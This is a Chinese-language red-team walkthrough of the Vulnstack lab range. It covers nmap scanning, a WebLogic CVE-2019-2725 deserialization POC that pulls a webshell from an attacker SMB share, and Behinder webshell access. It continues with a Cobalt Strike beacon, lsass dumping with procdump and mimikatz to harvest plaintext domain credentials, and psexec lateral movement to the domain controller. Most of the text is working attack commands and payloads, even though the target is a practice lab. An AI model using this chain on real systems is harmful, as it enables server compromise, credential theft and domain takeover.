靶場(chǎng)實(shí)戰(zhàn) | ATT&CK實(shí)戰(zhàn) Vulnstack 紅隊(duì)（二）

nmap掃描

nmap -p- -T5 192.168.111.80 -o web

-p- 表示掃描所有端口；?

-T5 指定掃描過程使用的時(shí)序，總共有6個(gè)級(jí)別（0-5），級(jí)別越高，掃描速度越快， 但也容易被防火墻或IDS檢測(cè)并屏蔽掉，在網(wǎng)絡(luò)通訊狀況較好的情況下推薦使用T4。

-o 保存掃描結(jié)果到文件web

常用端口是開放狀態(tài)1433是mssql，7001我們知道是weblogic服務(wù)，因?yàn)槲覀兦懊媸止?開啟的?？紤]weblogic服務(wù)漏洞，找到WeblogicScan工具掃一下。（WeblogicScan工具下載鏈接請(qǐng)?jiān)诤笈_(tái)回復(fù)“工具鏈接”）

python3 WeblogicScan.py -u 192.168.111.80 -p 7001

發(fā)現(xiàn)一個(gè)漏洞

CVE-2019-2725漏洞描述：

? ? ? ?這是一個(gè)Weblogic反序列化遠(yuǎn)程代碼執(zhí)行漏洞。部分版本 WebLogic中默認(rèn)包含的 wls9_async_response 包，為WebLogic Server提供異步通 訊服務(wù)。由于該WAR包在反序列化處理輸入信息時(shí)存在缺陷，攻擊者可以發(fā)送精心 構(gòu)造的惡意 HTTP 請(qǐng)求，獲得目標(biāo)服務(wù)器的權(quán)限，在未授權(quán)的情況下遠(yuǎn)程執(zhí)行命令。

我們需要先把/root/Behinder/server/shell.jsp webshell木馬程序上傳weblogic服務(wù)器上。然后再使用冰蝎連接shell.jsp木馬程序。

impacket-smbserver share /root/桌面/Behinder/server &

POC:

POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.111.80:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98
Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,
image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 841
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">

xx
xx
xmlns:work="http://bea.com/2004/06/soap/workarea/">



cmd


/c


copy \\192.168.111.5\share\shell.jsp
servers\AdminServer\tmp\_WL_internal\bea_wls9_async_response\8tpk
ys\war\1.jsp

發(fā)包：

202狀態(tài)碼：Accepted 表示服務(wù)器端已經(jīng)收到請(qǐng)求消息，但是尚未進(jìn)行處理。但是對(duì) 于請(qǐng)求的處理卻是無保證的，即稍后無法通過 HTTP 協(xié)議給客戶端發(fā)送一個(gè)異步請(qǐng) 求來告知其請(qǐng)求的處理結(jié)果。這個(gè)狀態(tài)碼被設(shè)計(jì)用來將請(qǐng)求交由另外一個(gè)進(jìn)程或者服 務(wù)器來進(jìn)行處理，或者是對(duì)請(qǐng)求進(jìn)行批處理的情形。

問題：發(fā)現(xiàn)無法訪問共享的文件

上傳冰蝎的馬

啟動(dòng)冰蝎

java -jar Behinder_v3.0_Beta6_linux.jar &

冰蝎連接

URL：http://192.168.111.80:7001/_async/shell.jsp
密碼：rebeyond

連接成功

CS上線：啟動(dòng)cs服務(wù)器，密碼是123456

./teamserver 192.168.111.5 123456 &

啟動(dòng)客戶端

./start.sh &

接下來創(chuàng)建一個(gè)監(jiān)聽器

在Attacks中選擇

選擇之后保存，再利用冰蝎上傳這個(gè)exe文件

接下來在虛擬終端中運(yùn)行這個(gè)程序即可?

打開會(huì)話，將命令執(zhí)行周期修改為2s

查看當(dāng)前用戶身份，為admin賬戶

使用 procdump64+mimikatz 獲取win用戶明文密碼

procdump64.exe 介紹：它的主要目的是監(jiān)控應(yīng)用程序的CPU異常動(dòng)向, 并在此異常 時(shí)生成crash dump文件, 供研發(fā)人員和管理員確定問題發(fā)生的原因。?

lsass.exe 進(jìn)程概述：lsass.exe是一個(gè)系統(tǒng)進(jìn)程，用于微軟Windows系統(tǒng)的安全機(jī) 制。它用于本地安全和登陸策略。也就是說lsass.exe進(jìn)程運(yùn)行后，里面會(huì)保存用戶帳號(hào)和密碼信息。

beacon> shell procdump64.exe -accepteula -ma lsass.exe lsass.dmp

參數(shù)說明：

-accepteula參數(shù)：指定是否自動(dòng)接受 Microsoft 軟件許可條款。所有無人參與安裝都需要此設(shè)置。-ma 參數(shù)：生成full dump, 即包括進(jìn)程的所有內(nèi)存. 默認(rèn)的dump格式包括線程和句柄信息.

解密，這里數(shù)字衛(wèi)士沒有攔擊并不說明 mimikatz 是免殺的，實(shí)際環(huán)境如果 mimikatz 不是免殺的需 要將 lsass.dmp 文件拖回本地放至相同的系統(tǒng)中進(jìn)行解密。

shell mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"
"exit"> password.txt

直接使用 download 命令下載，下載后會(huì)保存到程序目錄的 downloads 目錄。

hashdump
logonpasswords

域用戶名：de1ay\mssql          密碼：1qaz@WSX域用戶名：de1ay\administrator  密碼：1qaz@WSX?#這是DC域管理員用戶和密碼本地用戶名：WEB\de1ay ???????? 密碼：1qaz@WSX 該用戶是系統(tǒng)本地登錄系統(tǒng)用的。

beacon> shell ipconfig /all

beacon> shell net group "domain controllers" /domain

主機(jī)名：DC，完整主機(jī)是：DC.de1ay.com再確認(rèn)主機(jī)名為DC的IP地址：beacon> shell ping dc或：beacon> shell ping DC

shell net group "domain admins" /domain

beacon> rev2self

beacon> getuid

beacon> make_token DE1AY\administrator 1qaz@WSX

beacon> jump psexec DC smb或：jump?psexec?10.10.10.10?smb?#目標(biāo)機(jī)器可以是?DC?主機(jī)名，也可以是?IP